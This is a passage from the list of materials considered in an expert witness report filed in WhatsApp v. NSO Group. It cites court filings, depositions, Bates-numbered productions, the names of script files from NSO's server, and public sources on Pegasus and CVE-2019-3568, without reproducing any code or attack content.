Declaration of Shalev Hulio in Support of Defendants' Motion to Dismiss (Dkt. No. 45-11) (Apr. 2, 2020).

Defendants' Opposition to Motion to Compel Discovery Regarding AWS Server (Dkt. No. 339) (Jul.12, 2024).

Defendants' Responses & Objections to Plaintiffs' Requests for Admission, Response to RFA No. 14 (Apr. 17, 2023).

Deposition of Claudiu Gheorghe, WhatsApp Incorporated (Aug. 16, 2024).

Deposition of Yaron Shohat, NSO Group Technologies Limited (Aug. 28, 2024).

Exhibit 1 through 11 – #1, Att. #1 in WhatsApp Inc. v. NSO Group Technologies Limited (N.D. Cal., 4:19-cv-07123).

Pegasus – Product Description, Complaint Ex. 10 (Dkt. No. 1-1).

Plaintiffs' Opposition to Defendants' Motion to Dismiss (Dkt. No. 55-6 through 55-17) (Apr. 23, 2020).

Plaintiffs' [REDACTED] Motion to Compel Discovery Regarding AWS Server (Dkt. No. 332) (Jul. 5, 2024).

Plaintiffs' Reply Memorandum ISO Motion to Compel Regarding AWS Server (Dkt. No. 340) (Jul. 15, 2024).

Press Release, NSO Group Acquired by its Management, Francisco Partners (Compl. Ex. 4 (Dkt. No. 1)).

**DEFENDANTS' INTERNAL DOCUMENTATION**

NSO Group Technologies Limited, Heaven System Architecture Specification, (NSO_WHATSAPP_00000823 – NSO_WHATSAPP_00000826).

NSO Group Technologies Limited, Heaven OpSec, (NSO_WHATSAPP_00008957 – NSO_WHATSAPP_00008962).

**DEFENDANTS' PRODUCTION PERTAINING TO SERVER LOCATIONS**

WA-NSO-00016429 – WA-NSO-00016433.

WA-NSO-00166473.

**HC-AEO - DEFENDANT PRODUCTIONS**

COMPASS_WHATSAPP_00000231 – COMPASS_WHATSAPP_00000231.

COMPASS_WHATSAPP_00000262.

FPM-00015627 – FPM-00015638.

SHANER_WHATSAPP_00000001 – SHANER_WHATSAPP_00001959.

WESTBRIDGE_WHATSAPP_00000653 – WESTBRIDGE_WHATSAPP_00000659.

WESTBRIDGE_WHATSAPP_00001247 – WESTBRIDGE_WHATSAPP_00001251.

WESTBRIDGE_WHATSAPP_00001698.

WESTBRIDGE_WHATSAPP_00002716.

WESTBRIDGE_WHATSAPP_00003572 – WESTBRIDGE_WHATSAPP_00003595.

WA-NSO-00014794 – WA-NSO-00014813.

WA-NSO-00055668.

WA-NSO-00100628 – WA-NSO-00100673.

WA-NSO-00111560 – WA-NSO-00111561.

WA-NSO-00017582.

**MATERIALS FROM DEFENDANTS' AWS SERVER**

api.py.

client.py.

dal.py, (WA-NSO-00016500 – WA-NSO-00016501).

exploit.py, (WA-NSO-00016474).

February 2023 Release Artifacts, (WA-NSO-00016503 – WA-NSO-00017151).

fingerprint.py.

full_fingerprint.py.

funxmpp.py.

helloworld.py.

leak_tests.py.

noise_pb2.py.

plane.py.

Docusign Envelope ID: 5E56B0BD-3069-4B07-8A24-E352D98B4824    Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 57 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    48

protocol.py.

reason.py.

relay.py.

send_text_message.py.

server.py.

server_1.py.

server_2.py.

server_3.py.

signaling.py.

signaling_tests.py.

silent_fingerprint.py.

sparrow_test.py.

stun.py.

test.py.

tester.py.

tester_config.py.

timer_heap_tests.py.

txcache_tests.py.

WA-NSO-00016434 – WA-NSO-00016473.

WA-NSO-00016475 – WA-NSO-00016499.

WA-NSO-00016502.

WA-NSO-00137014 – WA-NSO-00137016.

**OPEN SOURCE**

American Registry for Internet Numbers (ARIN), ARIN Whois/RDAP,
    https://search.arin.net/rdap/?query=157.240.0.0%2F16.

American Registry for Internet Numbers (ARIN), ARIN Whois/RDAP,
    https://search.arin.net/rdap/?query=179.60.192.48.

American Registry for Internet Numbers (ARIN), WHOIS-RWS,
    https://whois.arin.net/rest/net/NET-104-223-0-0-1/pft?s=104.223.76.220.

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef   49

American Registry for Internet Numbers (ARIN), WHOIS-RWS,
    https://whois.arin.net/rest/net/NET-54-93-0-0-1/pft?s=54.93.81.200.

Farrow Ronan, How Democracies Spy on Their Citizens, New Yorker (Apr. 18, 2022),
    https://www.newyorker.com/magazine/2022/04/25/how-democracies-spy-on-their-
    citizens.

NIST, CVE-2019-3568 Detail, National Vulnerability Database (May 14, 2019),
    https://nvd.nist.gov/vuln/detail/CVE-2019-3568.

NSO Group Technologies Limited, https://www.nsogroup.com.

NSO Group Technologies Limited, Transparency and Responsibility Report 2023 (Dec. 31, 2023),
    https://www.nsogroup.com/wp-content/uploads/2023/12/2023-Transparency-and-
    Responsibility-Report.pdf.

Meta Platforms, Inc., Whitehat Information, Facebook (Sep. 12, 2018),
    https://www.facebook.com/whitehat, Internet Archive (Apr. 28, 2019),
    https://web.archive.org/web/20190428185742/https://www.facebook.com/whitehat.

Shankland, Stephen, Pegasus Spyware and Citizen Surveillance: Here's What You Should Know,
    CNET (Jul. 19, 2022), https://www.cnet.com/tech/mobile/pegasus-spyware-and-citizen-
    surveillance-what-you-need-to-know.

WhatsApp LLC, 400 Million Stories, WhatsApp Blog (Dec. 19, 2013),
    https://blog.whatsapp.com/400-million-stories.

WhatsApp LLC, 500,000,000, WhatsApp Blog (Apr. 22, 2014), https://blog.whatsapp.com/500-
    000-000.

WhatsApp LLC, One Billion, WhatsApp Blog (Feb. 1, 2016), https://blog.whatsapp.com/one-
    billion.

WhatsApp LLC, Two Billion Users -- Connecting the World Privately, WhatsApp Blog (Feb. 12,
    2020), https://blog.whatsapp.com/two-billion-users-connecting-the-world-privately.

WhatsApp LLC, About end-to-end encryption, WhatsApp Help Center,
    https://faq.whatsapp.com/820124435853543.

**PLAINTIFFS' INTERNAL DOCUMENTATION**

Infrastructure Related to Exploit Targeting WA VOIP Vulnerability (WA-NSO-00192007 – WA-
    NSO-00192017).

Lander Brandt, Analyzing Scripts.

Lander Brandt, NSO Script Review.

Lander Brandt, WhatsApp Native Surface Overview.

Meta Platforms, Inc., Relay Signaling.

Meta Platforms, Inc., Signaling.

Meta Platforms, Inc., Technical Analysis of WhatsApp Zero-Click Exploit (WA-NSO-00121258 – WA-NSO-00121269).

Meta Platforms, Inc., Technical analysis of WhatsApp 0-click exploit (WA-NSO-00125122 – WA-NSO-00125149).

**PLAINTIFFS' INTERNAL ENGINEERING TICKETS**

SEV Print - S182393.pdf.

WA-NSO-00059196 – WA-NSO-00059201.

WA-NSO-00166464 – WA-NSO-00166472.

WA-NSO-00192765 – WA-NSO-00192785.

WA-NSO-00192812 – WA-NSO-00192815.

**PLAINTIFFS' INFRASTRUCTURE LOG FILES**

WhatsApp Client Crash Logs, (WA-NSO-00017211 – WA-NSO-00017572).

bash_commands_easy_read.txt, (WA-NSO-00017573 – WA-NSO-00017574).

edgeray_packets_attack_0_64_f_filter.txt, (WA-NSO-00017575).

edgeray_packets_attack_0_32_f_filter.txt, (WA-NSO-00017576).

edgeray_phones_to_ips.csv, (WA-NSO-00017577).

edgeray_phones_to_ips.txt, (WA-NSO-00017578).

stanzaming_crashdumps.csv, (WA-NSO-00017579).

wa_voip_invalid_stanzas.csv, (WA-NSO-00017580).

wa_voip_invalid_stanzas_backfill_final.csv, (WA-NSO-00017581).